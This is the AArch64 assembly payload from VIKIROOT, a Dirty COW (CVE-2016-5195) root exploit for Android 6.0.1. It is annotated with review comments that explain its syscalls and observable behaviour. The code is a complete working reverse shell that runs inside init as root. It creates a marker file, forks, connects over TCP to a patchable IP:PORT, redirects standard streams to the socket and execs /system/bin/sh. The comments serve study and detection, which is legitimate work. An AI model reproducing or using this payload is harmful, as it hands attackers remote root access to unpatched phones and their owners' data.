/*
* CVE-2016-5195 POC FOR ANDROID 6.0.1 MARSHMALLOW
*
* Heavily inspired by https://github.com/scumjr/dirtycow-vdso
*
* This file is part of VIKIROOT, https://github.com/hyln9/VIKIROOT
*
* Copyright (C) 2016-2017 Virgil Hou <virgil@zju.edu.cn>
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
// Review notes (AArch64 Linux, GNU as syntax: `//` is the comment
// marker; `;` would be a statement separator, not a comment).
//   Syscall convention used throughout: number in x8, arguments in
//   x0..x5, `svc 0`, result in x0; a result in [-4095, -1] is -errno.
//   The only stack use is the 16-byte slot pushed at _start: the
//   parent pops it at `return`, the child reuses it as execve's argv.
//   All addresses are formed with `adr`, so the code is position-
//   independent but the data labels at the bottom are layout-sensitive.
//
// Observable behaviour (for triage/detection): proceeds only when
// running as uid 0 and pid 1; creates the marker file
// /data/local/tmp/.x (at most once, because of O_EXCL); forks via
// clone; the child connects out to IP:PORT over TCP, binds
// stdin/stdout/stderr to the socket and execs /system/bin/sh. The
// parent returns to its caller with x0/x1 restored.

// Linux asm-generic syscall numbers (the table AArch64 uses).
.equ SYS_OPENAT, 0x38
.equ SYS_SOCKET, 0xc6
.equ SYS_CONNECT, 0xcb
.equ SYS_DUP3, 0x18
.equ SYS_CLONE, 0xdc
.equ SYS_EXECVE, 0xdd
.equ SYS_EXIT, 0x5d
.equ SYS_READLINKAT, 0x4e // defined but not used in this file
.equ SYS_GETUID, 0xae
.equ SYS_GETPID, 0xac
// Kernel ABI constants (same values as the Linux uapi headers).
.equ AF_INET, 0x2
.equ O_EXCL, 0x80
.equ O_CREAT, 0x40
.equ S_IRWXU, 0x1c0 // 0700
.equ SOCK_STREAM, 0x1
.equ STDIN, 0x0
.equ STDOUT, 0x1
.equ STDERR, 0x2
.equ SIGCHLD, 0x11
// Reverse-connect endpoint. 0xdeadc0de is obviously a placeholder;
// presumably both fields are patched by the injector before the payload
// is written out -- confirm against the loader, not visible here.
.equ IP, 0xdeadc0de
.equ PORT, 0x1337
_start:
////////////////////////////////////////////////////////////////
//
// save registers
//
////////////////////////////////////////////////////////////////
// Preserve the caller's x0/x1; they are restored at `return`.
// This push is the payload's only stack frame (16 bytes, keeps sp aligned).
stp x0, x1, [sp,#-16]!
////////////////////////////////////////////////////////////////
//
// target init(0)
// return if getuid() != 0 or getpid() !=1
//
////////////////////////////////////////////////////////////////
mov x8, SYS_GETUID
svc 0
cbnz w0, return // not root: leave the caller untouched
mov x8, SYS_GETPID
svc 0
cmp w0, 1
b.ne return // not init: leave the caller untouched
////////////////////////////////////////////////////////////////
//
// return if open("/data/local/tmp/.x", O_CREAT|O_EXCL, ?) fails
// use "openat" instead since "open" is deprecated
// intended to detect write permission and avoid conflict
//
////////////////////////////////////////////////////////////////
mov w0, 0 // dirfd is ignored (the path is absolute)
adr x1, path
mov w2, O_CREAT|O_EXCL
mov w3, S_IRWXU
mov x8, SYS_OPENAT
svc 0
// Error check: cmn sets flags as for `cmp x0, -4096`, so b.hi fires
// when x0 is in [-4095, -1], i.e. -errno (EEXIST once the marker
// exists, which is what makes this run at most once).
// The returned fd is neither used nor closed; the file is only a marker.
cmn x0, #1, LSL#12
b.hi return
////////////////////////////////////////////////////////////////
//
// fork is deprecated, replaced with clone
//
////////////////////////////////////////////////////////////////
// clone(SIGCHLD, 0, 0, 0, 0) is the fork() equivalent. The parent
// (child pid, nonzero) and a failed clone (negative) both take
// `return`; only the child (0) falls through.
mov x0, SIGCHLD
mov x1, 0
mov x2, 0
mov x3, 0
mov x4, 0
mov x8, SYS_CLONE
svc 0
cbnz w0, return
////////////////////////////////////////////////////////////////
//
// reverse connect (child process from here on)
//
////////////////////////////////////////////////////////////////
// sockfd = socket(AF_INET, SOCK_STREAM, 0)
mov x0, AF_INET
mov x1, SOCK_STREAM
mov x2, 0
mov x8, SYS_SOCKET
svc 0
// Keep sockfd in x3; the AArch64 syscall ABI preserves every register
// except x0, so x3 survives the svc instructions below.
mov x3, x0
// connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
// x0 still holds sockfd from socket(). socket() errors are not checked
// explicitly; a negative fd makes connect fail and lands in `exit`.
adr x1, sockaddr
mov x2, 0x10 // sizeof(struct sockaddr_in)
mov x8, SYS_CONNECT
svc 0
cbnz w0, exit // any connect failure ends the child
// dup3(sockfd, STDIN, 0) ...
// dup3 rather than dup2: dup2 is not in the AArch64 syscall table.
// x0 (sockfd) and x2 (flags) are set once and kept across the three
// calls; only x1 (the target fd) changes.
mov x0, x3
mov x2, 0
mov x1, STDIN
mov x8, SYS_DUP3
svc 0
mov x1, STDOUT
mov x8, SYS_DUP3
svc 0
mov x1, STDERR
mov x8, SYS_DUP3
svc 0
// execve('/system/bin/sh', NULL, NULL)
// argv = { shell, NULL } is built in the 16-byte slot pushed at _start
// (the child never executes `return`, so overwriting the saved x0/x1
// there is harmless); envp = NULL.
adr x0, shell
mov x2, 0
str x0, [sp, 0]
str x2, [sp, 8]
mov x1, sp
mov x8, SYS_EXECVE
svc 0
exit:
// Child bail-out: reached on connect failure or if execve returns.
mov x0, 0
mov x8, SYS_EXIT
svc 0
return:
// Parent / bail-out path: restore x0,x1, then branch to the entry-time
// x30 with x16 moved into x30 first. NOTE(review): what x16 holds here
// depends on how the injector transfers control to _start -- not
// visible in this file; confirm against the loader.
ldp x0, x1, [sp],#16
mov x17, x30
mov x30, x16
nop // padding; purpose not evident from this file
nop
br x17
path:
.string "/data/local/tmp/.x" // marker file (NUL-terminated)
.balign 4
sockaddr:
// struct sockaddr_in as laid out in memory: sin_family, sin_port,
// sin_addr. Only 8 bytes are defined; the 16-byte length passed to
// connect makes the kernel read 8 more bytes (sin_zero) from whatever
// follows, i.e. the start of `shell`. Harmless for AF_INET, where the
// kernel does not interpret sin_zero.
.short AF_INET
.short PORT
.word IP
shell:
.string "/system/bin/sh" // also serves as the sin_zero tail above